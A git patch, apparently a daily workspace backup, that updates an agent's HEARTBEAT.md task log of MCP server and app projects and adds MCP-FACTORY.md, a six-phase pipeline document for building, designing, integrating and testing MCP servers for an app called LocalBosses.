From a2c95437c11f3b1bd169a93c77df8df42c56dfe7 Mon Sep 17 00:00:00 2001 From: Jake Shore Date: Wed, 4 Feb 2026 23:01:37 -0500 Subject: [PATCH] Daily backup: 2026-02-04 --- HEARTBEAT.md | 114 +- MCP-FACTORY.md | 572 +++ agent-repos-study-plan.md | 1497 ++++++++ factory-tools/README.md | 105 + factory-tools/mcp-inspector | 1 + factory-tools/mcp-validator | 1 + factory-tools/package.json | 16 + .../reports/compliance-2026-02-05.json | 194 + .../reports/compliance-2026-02-05.md | 37 + .../reports/discovery-2026-02-05.json | 126 + factory-tools/scripts/discover-all.mjs | 107 + .../scripts/fix-unknown-tool-error.mjs | 125 + factory-tools/scripts/validate-all.mjs | 127 + factory-tools/server-registry.json | 35 + .../test-configs/acuity-scheduling-tests.json | 174 + .../test-configs/acuity-scheduling.json | 12 + .../test-configs/bamboohr-tests.json | 113 + factory-tools/test-configs/bamboohr.json | 12 + .../test-configs/basecamp-tests.json | 150 + factory-tools/test-configs/basecamp.json | 13 + .../test-configs/bigcommerce-tests.json | 462 +++ factory-tools/test-configs/bigcommerce.json | 12 + factory-tools/test-configs/brevo-tests.json | 318 ++ factory-tools/test-configs/brevo.json | 11 + .../test-configs/calendly-tests.json | 143 + factory-tools/test-configs/calendly.json | 11 + factory-tools/test-configs/clickup-tests.json | 300 ++ factory-tools/test-configs/clickup.json | 11 + factory-tools/test-configs/close-tests.json | 554 +++ factory-tools/test-configs/close.json | 11 + factory-tools/test-configs/clover-tests.json | 217 ++ factory-tools/test-configs/clover.json | 14 + .../test-configs/constant-contact-tests.json | 367 ++ .../test-configs/constant-contact.json | 11 + .../test-configs/fieldedge-tests.json | 370 ++ factory-tools/test-configs/fieldedge.json | 12 + .../test-configs/freshbooks-tests.json | 358 ++ factory-tools/test-configs/freshbooks.json | 12 + .../test-configs/freshdesk-tests.json | 315 ++ factory-tools/test-configs/freshdesk.json | 12 + 
factory-tools/test-configs/gusto-tests.json | 86 + factory-tools/test-configs/gusto.json | 11 + .../test-configs/helpscout-tests.json | 287 ++ factory-tools/test-configs/helpscout.json | 11 + .../test-configs/housecall-pro-tests.json | 227 ++ factory-tools/test-configs/housecall-pro.json | 11 + factory-tools/test-configs/jobber-tests.json | 272 ++ factory-tools/test-configs/jobber.json | 11 + factory-tools/test-configs/keap-tests.json | 444 +++ factory-tools/test-configs/keap.json | 11 + .../test-configs/lightspeed-tests.json | 377 ++ factory-tools/test-configs/lightspeed.json | 12 + .../test-configs/mailchimp-tests.json | 156 + factory-tools/test-configs/mailchimp.json | 11 + .../test-configs/pipedrive-tests.json | 470 +++ factory-tools/test-configs/pipedrive.json | 11 + .../test-configs/rippling-tests.json | 179 + factory-tools/test-configs/rippling.json | 11 + .../test-configs/servicetitan-tests.json | 288 ++ factory-tools/test-configs/servicetitan.json | 13 + .../test-configs/squarespace-tests.json | 159 + factory-tools/test-configs/squarespace.json | 11 + factory-tools/test-configs/toast-tests.json | 188 + factory-tools/test-configs/toast.json | 13 + .../test-configs/touchbistro-tests.json | 250 ++ factory-tools/test-configs/touchbistro.json | 12 + factory-tools/test-configs/trello-tests.json | 346 ++ factory-tools/test-configs/trello.json | 12 + factory-tools/test-configs/wave-tests.json | 336 ++ factory-tools/test-configs/wave.json | 11 + factory-tools/test-configs/wrike-tests.json | 251 ++ factory-tools/test-configs/wrike.json | 11 + factory-tools/test-configs/zendesk-tests.json | 266 ++ factory-tools/test-configs/zendesk.json | 13 + manim-mcp | 1 + mcp-command-center/PIPELINE-OPERATOR.md | 118 + mcp-command-center/index.html | 1350 +++++++ mcp-command-center/state.json | 121 + .../acuity-scheduling/src/index.ts | 8 + .../mcp-servers/bamboohr/src/index.ts | 8 + .../mcp-servers/basecamp/src/index.ts | 8 + .../mcp-servers/bigcommerce/src/index.ts | 8 + 
mcp-diagrams/mcp-servers/brevo/src/index.ts | 8 + .../mcp-servers/calendly/src/index.ts | 8 + mcp-diagrams/mcp-servers/clickup/src/index.ts | 8 + mcp-diagrams/mcp-servers/close/src/index.ts | 8 + mcp-diagrams/mcp-servers/clover/src/index.ts | 8 + .../mcp-servers/constant-contact/src/index.ts | 8 + .../mcp-servers/fieldedge/src/index.ts | 8 + .../mcp-servers/freshbooks/src/index.ts | 8 + .../mcp-servers/freshdesk/src/index.ts | 8 + mcp-diagrams/mcp-servers/gusto/src/index.ts | 8 + .../mcp-servers/helpscout/src/index.ts | 8 + .../mcp-servers/housecall-pro/src/index.ts | 8 + mcp-diagrams/mcp-servers/jobber/src/index.ts | 8 + mcp-diagrams/mcp-servers/keap/src/index.ts | 8 + .../mcp-servers/lightspeed/src/index.ts | 8 + .../mcp-servers/mailchimp/src/index.ts | 8 + .../mcp-servers/pipedrive/src/index.ts | 8 + .../mcp-servers/rippling/src/index.ts | 8 + .../mcp-servers/servicetitan/src/index.ts | 8 + .../mcp-servers/squarespace/src/index.ts | 8 + mcp-diagrams/mcp-servers/toast/src/index.ts | 8 + .../mcp-servers/touchbistro/src/index.ts | 8 + mcp-diagrams/mcp-servers/trello/src/index.ts | 8 + mcp-diagrams/mcp-servers/wave/src/index.ts | 8 + mcp-diagrams/mcp-servers/wrike/src/index.ts | 8 + mcp-diagrams/mcp-servers/zendesk/src/index.ts | 8 + mcp-factory-reviews/BOSS-SYNTHESIS.md | 33 + mcp-factory-reviews/SYNTHESIS.md | 158 + mcp-factory-reviews/alpha-protocol-review.md | 470 +++ mcp-factory-reviews/beta-production-review.md | 547 +++ mcp-factory-reviews/boss-alexei-proposals.md | 816 ++++ mcp-factory-reviews/boss-kofi-proposals.md | 582 +++ mcp-factory-reviews/boss-mei-proposals.md | 786 ++++ mcp-factory-reviews/gamma-aiux-review.md | 792 ++++ mcp-jest.generated.json | 143 + memory/2026-02-04.md | 109 + memory/burton-method-research-intel.md | 34 +- memory/mcp-api-keys-progress.md | 74 + mixed-use-entertainment-intel.md | 29 +- openclaw-gallery/UPWORK_REFERENCE.md | 188 + .../pdfs/openclaw-capabilities.md | 194 + openclaw-gallery/pdfs/openclaw-packages.md | 200 + 
.../video/openclaw-promo/UPGRADE_SPEC.md | 31 + .../video/openclaw-promo/package.json | 27 + .../video/openclaw-promo/remotion.config.ts | 4 + .../openclaw-promo/src/OpenClawPromo.tsx | 147 + .../video/openclaw-promo/src/Root.tsx | 18 + .../src/components/AnimatedNumber.tsx | 38 + .../src/components/CanvasViewport.tsx | 67 + .../src/components/ChannelIcons.tsx | 58 + .../src/components/DrawLine.tsx | 45 + .../src/components/FadeSlideIn.tsx | 46 + .../src/components/GlassCard.tsx | 131 + .../src/components/KineticText.tsx | 142 + .../src/components/MeshBackground.tsx | 100 + .../src/components/ParticleField.tsx | 97 + .../src/components/StaggeredGrid.tsx | 51 + .../src/components/TypewriterText.tsx | 43 + .../video/openclaw-promo/src/index.ts | 4 + .../openclaw-promo/src/scenes/Scene10Cta.tsx | 199 + .../openclaw-promo/src/scenes/Scene1Hook.tsx | 256 ++ .../src/scenes/Scene2Problem.tsx | 406 ++ .../src/scenes/Scene3LogoReveal.tsx | 285 ++ .../src/scenes/Scene4MultiChannel.tsx | 359 ++ .../src/scenes/Scene5McpTools.tsx | 349 ++ .../src/scenes/Scene6ProductTour.tsx | 373 ++ .../src/scenes/Scene7PowerFeatures.tsx | 769 ++++ .../src/scenes/Scene8Architecture.tsx | 218 ++ .../src/scenes/Scene9Pricing.tsx | 183 + .../video/openclaw-promo/src/styles/theme.ts | 52 + .../video/openclaw-promo/tsconfig.json | 16 + pickle_history.txt | 1 + skills/mcp-api-analyzer/SKILL.md | 869 +++++ skills/mcp-app-designer/SKILL.md | 2170 +++++++++++ skills/mcp-apps-official/SKILL.md | 518 ++- skills/mcp-localbosses-integrator/SKILL.md | 1543 ++++++++ skills/mcp-qa-tester/SKILL.md | 3388 +++++++++++++++++ skills/mcp-server-builder/SKILL.md | 2609 +++++++++++++ trending-repos-deep-dive.md | 178 + 161 files changed, 34505 insertions(+), 100 deletions(-) create mode 100644 MCP-FACTORY.md create mode 100644 agent-repos-study-plan.md create mode 100644 factory-tools/README.md create mode 160000 factory-tools/mcp-inspector create mode 160000 factory-tools/mcp-validator create mode 100644 
factory-tools/package.json create mode 100644 factory-tools/reports/compliance-2026-02-05.json create mode 100644 factory-tools/reports/compliance-2026-02-05.md create mode 100644 factory-tools/reports/discovery-2026-02-05.json create mode 100644 factory-tools/scripts/discover-all.mjs create mode 100644 factory-tools/scripts/fix-unknown-tool-error.mjs create mode 100644 factory-tools/scripts/validate-all.mjs create mode 100644 factory-tools/server-registry.json create mode 100644 factory-tools/test-configs/acuity-scheduling-tests.json create mode 100644 factory-tools/test-configs/acuity-scheduling.json create mode 100644 factory-tools/test-configs/bamboohr-tests.json create mode 100644 factory-tools/test-configs/bamboohr.json create mode 100644 factory-tools/test-configs/basecamp-tests.json create mode 100644 factory-tools/test-configs/basecamp.json create mode 100644 factory-tools/test-configs/bigcommerce-tests.json create mode 100644 factory-tools/test-configs/bigcommerce.json create mode 100644 factory-tools/test-configs/brevo-tests.json create mode 100644 factory-tools/test-configs/brevo.json create mode 100644 factory-tools/test-configs/calendly-tests.json create mode 100644 factory-tools/test-configs/calendly.json create mode 100644 factory-tools/test-configs/clickup-tests.json create mode 100644 factory-tools/test-configs/clickup.json create mode 100644 factory-tools/test-configs/close-tests.json create mode 100644 factory-tools/test-configs/close.json create mode 100644 factory-tools/test-configs/clover-tests.json create mode 100644 factory-tools/test-configs/clover.json create mode 100644 factory-tools/test-configs/constant-contact-tests.json create mode 100644 factory-tools/test-configs/constant-contact.json create mode 100644 factory-tools/test-configs/fieldedge-tests.json create mode 100644 factory-tools/test-configs/fieldedge.json create mode 100644 factory-tools/test-configs/freshbooks-tests.json create mode 100644 
factory-tools/test-configs/freshbooks.json create mode 100644 factory-tools/test-configs/freshdesk-tests.json create mode 100644 factory-tools/test-configs/freshdesk.json create mode 100644 factory-tools/test-configs/gusto-tests.json create mode 100644 factory-tools/test-configs/gusto.json create mode 100644 factory-tools/test-configs/helpscout-tests.json create mode 100644 factory-tools/test-configs/helpscout.json create mode 100644 factory-tools/test-configs/housecall-pro-tests.json create mode 100644 factory-tools/test-configs/housecall-pro.json create mode 100644 factory-tools/test-configs/jobber-tests.json create mode 100644 factory-tools/test-configs/jobber.json create mode 100644 factory-tools/test-configs/keap-tests.json create mode 100644 factory-tools/test-configs/keap.json create mode 100644 factory-tools/test-configs/lightspeed-tests.json create mode 100644 factory-tools/test-configs/lightspeed.json create mode 100644 factory-tools/test-configs/mailchimp-tests.json create mode 100644 factory-tools/test-configs/mailchimp.json create mode 100644 factory-tools/test-configs/pipedrive-tests.json create mode 100644 factory-tools/test-configs/pipedrive.json create mode 100644 factory-tools/test-configs/rippling-tests.json create mode 100644 factory-tools/test-configs/rippling.json create mode 100644 factory-tools/test-configs/servicetitan-tests.json create mode 100644 factory-tools/test-configs/servicetitan.json create mode 100644 factory-tools/test-configs/squarespace-tests.json create mode 100644 factory-tools/test-configs/squarespace.json create mode 100644 factory-tools/test-configs/toast-tests.json create mode 100644 factory-tools/test-configs/toast.json create mode 100644 factory-tools/test-configs/touchbistro-tests.json create mode 100644 factory-tools/test-configs/touchbistro.json create mode 100644 factory-tools/test-configs/trello-tests.json create mode 100644 factory-tools/test-configs/trello.json create mode 100644 
factory-tools/test-configs/wave-tests.json create mode 100644 factory-tools/test-configs/wave.json create mode 100644 factory-tools/test-configs/wrike-tests.json create mode 100644 factory-tools/test-configs/wrike.json create mode 100644 factory-tools/test-configs/zendesk-tests.json create mode 100644 factory-tools/test-configs/zendesk.json create mode 160000 manim-mcp create mode 100644 mcp-command-center/PIPELINE-OPERATOR.md create mode 100644 mcp-command-center/index.html create mode 100644 mcp-command-center/state.json create mode 100644 mcp-factory-reviews/BOSS-SYNTHESIS.md create mode 100644 mcp-factory-reviews/SYNTHESIS.md create mode 100644 mcp-factory-reviews/alpha-protocol-review.md create mode 100644 mcp-factory-reviews/beta-production-review.md create mode 100644 mcp-factory-reviews/boss-alexei-proposals.md create mode 100644 mcp-factory-reviews/boss-kofi-proposals.md create mode 100644 mcp-factory-reviews/boss-mei-proposals.md create mode 100644 mcp-factory-reviews/gamma-aiux-review.md create mode 100644 mcp-jest.generated.json create mode 100644 memory/2026-02-04.md create mode 100644 memory/mcp-api-keys-progress.md create mode 100644 openclaw-gallery/UPWORK_REFERENCE.md create mode 100644 openclaw-gallery/pdfs/openclaw-capabilities.md create mode 100644 openclaw-gallery/pdfs/openclaw-packages.md create mode 100644 openclaw-gallery/video/openclaw-promo/UPGRADE_SPEC.md create mode 100644 openclaw-gallery/video/openclaw-promo/package.json create mode 100644 openclaw-gallery/video/openclaw-promo/remotion.config.ts create mode 100644 openclaw-gallery/video/openclaw-promo/src/OpenClawPromo.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/Root.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/AnimatedNumber.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/CanvasViewport.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/ChannelIcons.tsx create mode 100644 
openclaw-gallery/video/openclaw-promo/src/components/DrawLine.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/FadeSlideIn.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/GlassCard.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/KineticText.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/MeshBackground.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/ParticleField.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/StaggeredGrid.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/TypewriterText.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/index.ts create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene10Cta.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene1Hook.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene2Problem.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene3LogoReveal.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene4MultiChannel.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene5McpTools.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene6ProductTour.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene7PowerFeatures.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene8Architecture.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene9Pricing.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/styles/theme.ts create mode 100644 openclaw-gallery/video/openclaw-promo/tsconfig.json create mode 100644 skills/mcp-api-analyzer/SKILL.md create mode 100644 skills/mcp-app-designer/SKILL.md create mode 100644 skills/mcp-localbosses-integrator/SKILL.md create mode 100644 
skills/mcp-qa-tester/SKILL.md create mode 100644 skills/mcp-server-builder/SKILL.md create mode 100644 trending-repos-deep-dive.md diff --git a/HEARTBEAT.md b/HEARTBEAT.md index 6a6e96e..5c633b5 100644 --- a/HEARTBEAT.md +++ b/HEARTBEAT.md @@ -1,85 +1,72 @@ # HEARTBEAT.md — Active Task State ## Current Task -- **Project:** LocalBosses App — MCP Server Integration Sprint -- **Last completed:** Built 4 new MCP servers (CloseBot, Meta Ads, Google Console, Twilio), shipped multi-panel thread system, fixed critical bugs, integrated Reonomy -- **Next step:** SongSense build (queued but hasn't started), live API testing for MCP servers, thread app expansion feature -- **Blockers:** Expired Anthropic API key in localbosses-app .env.local (competitor-research channel broken) +- **Project:** MCP Pipeline Factory + OpenClaw Upwork Launch +- **Last completed:** MCP Pipeline operator system (7 channels, 2 cron jobs, state.json), 8-week agent study plan (1,497 lines), CloseBot MCP (119 tools), factory testing infrastructure (30/30 servers 100% compliant), Das genre universe animation, OpenClaw gallery assets +- **Next step:** Jake reviewing OpenClaw video + gallery → Upwork listing, testing strategy decision for 8→9 advancement +- **Blockers:** Expired Anthropic API key in localbosses-app .env.local, testing strategy decision pending ## Active Projects -### LocalBosses App (PRIMARY — ACTIVE) +### MCP Pipeline Factory (PRIMARY — ACTIVE) +- **Location:** `mcp-command-center/` +- **Status:** Fully operational — autonomous operator mode +- **Discord channels:** 7 channels in "MCP PIPELINE" category +- **Cron jobs:** Daily standup 9 AM, heartbeat every 2 hours +- **State:** 35 MCPs at Stage 8 (Integration Complete) +- **Pending:** Testing strategy decision (dec-001) — no reaction yet +- **Dashboard:** `http://192.168.0.25:8888` + +### OpenClaw Upwork Service Launch +- **Location:** `openclaw-gallery/` +- **Status:** All assets complete, awaiting Jake review +- **Assets:** 15 
graphics, 6 mockups, 2 PDFs, 90-sec Remotion video +- **Pricing:** $2,499 / $7,499 / $24,999 tiers finalized +- **Next:** Upwork listing finalization after Jake approves video + +### LocalBosses App - **Location:** `localbosses-app/` -- **Status:** Major feature sprint completed 2/3 -- **Channel architecture:** - - BUSINESS OPS: #general, #automations, #crm, #google-ads, #competitor-research, #twilio - - MARKETING: #google-console, #meta-ads - - TOOLS: #templates, #nodes - - SYSTEM: #health -- **Multi-panel threads:** Shipped — 4-6 simultaneous, cross-channel persistent -- **All bugs fixed:** Channel switch blank screen, workflow builder data flow, thread persistence -- **Dev server:** `192.168.0.25:3000` (Next.js 16.1.6 + Turbopack) -- **TODO:** - - Thread app expansion (iframe covers top section with real data) - - Reonomy route.ts mapping (APP_DIRS + APP_NAME_MAP) - - Cold start fix (10-15s first request) - - Fix expired Anthropic API key +- **Status:** Major feature sprint completed, all bugs fixed +- **Dev server:** `192.168.0.25:3000` +- **Blocker:** Expired Anthropic API key in .env.local -### New MCP Servers (Built 2/3) -- **CloseBot MCP** — `closebot-mcp/` — 119 tools, 14 modules, 6 UI apps -- **Meta Ads MCP** — `meta-ads-mcp/` — ~55 tools, 11 categories, 11 UI apps -- **Google Console MCP** — `google-console-mcp/` — 22 tools, 5 UI apps -- **Twilio MCP** — 54 tools, 19 UI apps (integrated into LocalBosses) -- **All compile clean, none tested against live APIs yet** +### CloseBot MCP (NEW — COMPLETE) +- **Location:** `closebot-mcp/` +- **Status:** 119 tools, 4,656 lines, compiles clean +- **Needs:** CLOSEBOT_API_KEY env var for live testing -### MCP Servers (30 built earlier, all compiled) -- **Location:** `mcp-diagrams/mcp-servers/` -- **Status:** All 30 built with TypeScript → dist, ~240 tools total -- **Next:** Test against live APIs, write READMEs, publish to GitHub +### Factory Testing Infrastructure (NEW — COMPLETE) +- **Location:** `factory-tools/` 
+- **Status:** All 30 servers patched and rebuilt, 100/100 compliance +- **Tools:** mcp-jest, mcp-validator, mcp-add, MCP Inspector +- **Ready:** 702 test cases for live API testing (needs API keys) + +### 8-Week Agent Study Plan (NEW — COMPLETE) +- **Location:** `agent-repos-study-plan.md` +- **Status:** 1,497 lines, posted to #trending-agent-repos +- **Curriculum:** Pydantic-AI → MS Agent Framework → Agent-S → GPT Researcher → Yao → MetaGPT → ElizaOS → Capstone ### SongSense — AI Music Analysis Product (QUEUED) -- **Status:** Full architecture designed, Jake approved, but build hasn't started -- **Next step:** Build with paired agent teams (groups of 2, double-checking each other) -- **Priority:** Was supposed to be top priority but LocalBosses sprint took over +- **Status:** Full architecture designed, Jake approved, build hasn't started +- **Priority:** Still queued behind current sprint + +### MCP Servers (30 built earlier + 5 new) +- **Status:** 35 total, all at Stage 8, all compile clean +- **New:** CloseBot, Meta Ads, Google Console, Twilio, plus others ### GHL MCP Apps (65 apps — COMPLETE) - **Location:** `mcp-diagrams/GoHighLevel-MCP/src/ui/react-app/src/apps/` -- **Status:** All 65 built, 3 review rounds done, all builds passing -- **Integrated into:** LocalBosses app CRM channel (toolbar + thread system) +- **Status:** All 65 built, integrated into LocalBosses CRM channel -### GoHighLevel-MCP (main repo) -- **Location:** `mcp-diagrams/GoHighLevel-MCP/` -- **Repo:** `github.com/BusyBee3333/Go-High-Level-MCP-2026-Complete.git` -- **Status:** Uncommitted changes — new app-ui, apps system, server-lite, server-apps -- **Next:** Commit & push changes - -### MCP Business Research -- **Location:** `mcp-diagrams/` -- **Key finding:** 22 of 30 targets have ZERO MCP competition -- **Revenue projections:** $4-7.6M ARR at 24 months - -### MCP Animation Framework (Remotion) -- **Location:** `mcp-diagrams/mcp-animation-framework/` -- **Status:** Dolly camera version 
built -- **Next:** Get feedback on camera movement, iterate +## Das Projects +- **Genre Universe Animation:** Delivered to #manim (1080p60, 30 sequences) +- **Server Icon:** Set via Discord API ## Other Active Projects -### Reonomy Scraper v13 -- **Location:** workspace root -- **Status:** Production scraper built, also integrated as MCP + LocalBosses channel - ### Burton Method Research Intel - **Location:** `memory/burton-method-research-intel.md` -- **Status:** Ongoing competitor + EdTech trends tracking - -### Das Management -- **Folders:** `das-forum-form/`, `das-surya/`, `das-threads/`, `das-website/` -- **Das Surya Album Review:** Complete (`das-surya-review/`) - -### Genre Universe 3D Viz (Das) -- **Location:** `genre-viz/` -- **Status:** Built — Three.js interactive visualization +- **Status:** Updated Feb 4 — 7Sage reversal, Preply $150M raise ### Smart Model Routing - **Status:** Active — Sonnet default, auto-escalate to Opus @@ -87,8 +74,7 @@ ## Git Status - **Workspace repo:** `github.com/BusyBee3333/clawdbot-workspace.git` -- **GHL-MCP submodule:** Uncommitted changes - **Pending:** Daily backup commit --- -*Last updated: 2026-02-03 23:00 EST* +*Last updated: 2026-02-04 23:00 EST* diff --git a/MCP-FACTORY.md b/MCP-FACTORY.md new file mode 100644 index 0000000..5f8462c --- /dev/null +++ b/MCP-FACTORY.md @@ -0,0 +1,572 @@ +# MCP Factory — Production Pipeline + +> The systematic process for turning any API into a fully tested, production-ready MCP experience inside LocalBosses. + +--- + +## The Problem + +We've been building MCP servers ad-hoc: grab an API, bang out tools, create some apps, throw them in LocalBosses, move on. Result: 30+ servers that compile but have never been tested against live APIs, apps that may not render, tool descriptions that might not trigger correctly via natural language. 
+ +## The Pipeline + +``` +API Docs → Analyze → Build → Design → Integrate → Test → Ship + P1 P2 P3 P4 P5 P6 +``` + +> **6 phases.** Agents 2 (Build) and 3 (Design) run in parallel. QA findings route back to Builder/Designer for fixes before Ship. + +Every phase has: +- **Clear inputs** (what you need to start) +- **Clear outputs** (what you produce) +- **Quality gate** (what must pass before moving on) +- **Dedicated skill** (documented, repeatable instructions) +- **Agent capability** (can be run by a sub-agent) + +--- + +## Phase 1: Analyze (API Discovery & Analysis) + +**Skill:** `mcp-api-analyzer` +**Input:** API documentation URL(s), OpenAPI spec (if available), user guides, public marketing copy +**Output:** `{service}-api-analysis.md` + +### What the analysis produces: +1. **Service Overview** — What the product does, who it's for, pricing tiers +2. **Auth Method** — OAuth2 / API key / JWT / session — with exact flow +3. **Endpoint Catalog** — Every endpoint grouped by domain +4. **Tool Groups** — Logical groupings for lazy loading (aim for 5-15 groups) +5. **Tool Inventory** — Each tool with: + - Name (snake_case, descriptive) + - Description (optimized for LLM routing — what it does, when to use it) + - Required vs optional params + - Read-only / destructive / idempotent annotations +6. **App Candidates** — Which endpoints/features deserve visual UI: + - Dashboard views (aggregate data, KPIs) + - List/Grid views (searchable collections) + - Detail views (single entity deep-dive) + - Forms (create/edit workflows) + - Specialized views (calendars, timelines, funnels, maps) +7. 
**Rate Limits & Quirks** — API-specific gotchas + +### Quality Gate: +- [ ] Every endpoint is cataloged +- [ ] Tool groups are balanced (no group with 50+ tools) +- [ ] Tool descriptions are LLM-friendly (action-oriented, include "when to use") +- [ ] App candidates have clear data sources (which tools feed them) +- [ ] Auth flow is documented with example + +--- + +## Phase 2: Build (MCP Server) + +**Skill:** `mcp-server-builder` (updated from existing `mcp-server-development`) +**Input:** `{service}-api-analysis.md` +**Output:** Complete MCP server in `{service}-mcp/` + +### Server structure: +``` +{service}-mcp/ +├── src/ +│ ├── index.ts # Server entry, transport, lazy loading +│ ├── client.ts # API client (auth, request, error handling) +│ ├── tools/ +│ │ ├── index.ts # Tool registry + lazy loader +│ │ ├── {group1}.ts # Tool group module +│ │ ├── {group2}.ts # ... +│ │ └── ... +│ └── types.ts # Shared TypeScript types +├── dist/ # Compiled output +├── package.json +├── tsconfig.json +├── .env.example +└── README.md +``` + +### Must-haves (Feb 2026 standard): +- **MCP SDK `^1.26.0`** (security fix: GHSA-345p-7cg4-v4c7 in v1.26.0). 
Pin to v1.x — SDK v2 is pre-alpha, stable expected Q1 2026 +- **Lazy loading** — tool groups load on first use, not at startup +- **MCP Annotations** on every tool: + - `readOnlyHint` (true for GET operations) + - `destructiveHint` (true for DELETE operations) + - `idempotentHint` (true for PUT/upsert operations) + - `openWorldHint` (false for most API tools) +- **Zod validation** on all tool inputs +- **Structured error handling** — never crash, always return useful error messages +- **Rate limit awareness** — respect API limits, add retry logic +- **Pagination support** — tools that list things must handle pagination +- **Environment variables** — all secrets via env, never hardcoded +- **TypeScript strict mode** — no `any`, proper types throughout + +### Quality Gate: +- [ ] `npm run build` succeeds (tsc compiles clean) +- [ ] Every tool has MCP annotations +- [ ] Every tool has Zod input validation +- [ ] .env.example lists all required env vars +- [ ] README documents setup + tool list + +--- + +## Phase 3: Design (MCP Apps) + +**Skill:** `mcp-app-designer` +**Input:** `{service}-api-analysis.md` (app candidates section), server tool definitions +**Output:** HTML app files in `{service}-mcp/app-ui/` or `{service}-mcp/ui/` + +### App types and when to use them: + +| Type | When | Example | +|------|------|---------| +| **Dashboard** | Aggregate KPIs, overview | CRM Dashboard, Ad Performance | +| **Data Grid** | Searchable/filterable lists | Contact List, Order History | +| **Detail Card** | Single entity deep-dive | Contact Card, Invoice Preview | +| **Form/Wizard** | Create or edit flows | Campaign Builder, Appointment Booker | +| **Timeline** | Chronological events | Activity Feed, Audit Log | +| **Funnel/Flow** | Stage-based progression | Pipeline Board, Sales Funnel | +| **Calendar** | Date-based data | Appointment Calendar, Schedule View | +| **Analytics** | Charts and visualizations | Revenue Chart, Traffic Graph | + +### App architecture (single-file 
HTML): +```html + + + + + + +
+ + + +``` + +### Design rules: +- **Dark theme only** — `#1a1d23` background, `#2b2d31` cards, `#ff6d5a` accent, `#dcddde` text +- **Responsive** — must work from 280px to 800px width +- **Self-contained** — zero external dependencies, no CDN links +- **Four states** — loading skeleton, empty state, error state, data state +- **Compact** — no wasted space, dense but readable +- **Interactive** — hover effects, click handlers where appropriate +- **Data-driven** — renders whatever data it receives, graceful with missing fields + +### Quality Gate: +- [ ] Every app renders with sample data (no blank screens) +- [ ] Every app has loading, empty, and error states +- [ ] Dark theme is consistent with LocalBosses +- [ ] Works at 280px width (thread panel minimum) +- [ ] No external dependencies or CDN links + +--- + +## Phase 4: Integrate (LocalBosses) + +**Skill:** `mcp-localbosses-integrator` +**Input:** Built MCP server + apps +**Output:** Fully wired LocalBosses channel + +### Files to update: + +1. **`src/lib/channels.ts`** — Add channel definition: + ```typescript + { + id: "channel-name", + name: "Channel Name", + icon: "🔥", + category: "BUSINESS OPS", // or MARKETING, TOOLS, SYSTEM + description: "What this channel does", + systemPrompt: `...`, // Must include tool descriptions + when to use them + defaultApp: "app-id", // Optional: auto-open app + mcpApps: ["app-id-1", "app-id-2", ...], + } + ``` + +2. **`src/lib/appNames.ts`** — Add display names: + ```typescript + "app-id": { name: "App Name", icon: "📊" }, + ``` + +3. **`src/lib/app-intakes.ts`** — Add intake questions: + ```typescript + "app-id": { + question: "What would you like to see?", + category: "data-view", + skipLabel: "Show dashboard", + }, + ``` + +4. **`src/app/api/mcp-apps/route.ts`** — Add app routing: + ```typescript + // In APP_NAME_MAP: + "app-id": "filename-without-html", + // In APP_DIRS (if in a different location): + path.join(process.cwd(), "path/to/app-ui"), + ``` + +5.
**`src/app/api/chat/route.ts`** — Add tool routing: + - System prompt must know about the tools + - Tool results should include hidden `APP_DATA` blocks + - Or the workflow-specific variant of that hidden block for workflow-type apps + +### System prompt engineering: +The channel system prompt is CRITICAL. It must: +- Describe the tools available in natural language +- Specify when to use each tool (not just what they do) +- Include the hidden data block format so the AI returns structured data to apps +- Set the tone and expertise level + +### Quality Gate: +- [ ] Channel appears in sidebar under correct category +- [ ] All apps appear in toolbar +- [ ] Default app auto-opens on channel entry (if configured) +- [ ] System prompt mentions all available tools +- [ ] Intake questions are clear and actionable + +--- + +## Phase 5: Test (QA & Validation) + +**Skill:** `mcp-qa-tester` +**Input:** Integrated LocalBosses channel +**Output:** Test report + fixes + +### Testing layers: + +#### Layer 1: Static Analysis +- TypeScript compiles clean (`tsc --noEmit`) +- No `any` types in tool handlers +- All apps are valid HTML (no unclosed tags, no script errors) +- All routes resolve (no 404s for app files) + +#### Layer 2: Visual Testing (Peekaboo + Gemini) +```bash +# Capture the rendered app +peekaboo capture --app "Safari" --format png --output /tmp/test-{app}.png + +# Or use browser tool to screenshot +# browser → screenshot → analyze with Gemini + +# Gemini multimodal analysis +gemini "Analyze this screenshot of an MCP app. Check: +1. Does it render correctly (no blank screen, no broken layout)? +2. Is the dark theme consistent (#1a1d23 bg, #ff6d5a accent)? +3. Are there proper loading/empty states? +4. Is it responsive-friendly? +5. Any visual bugs?"
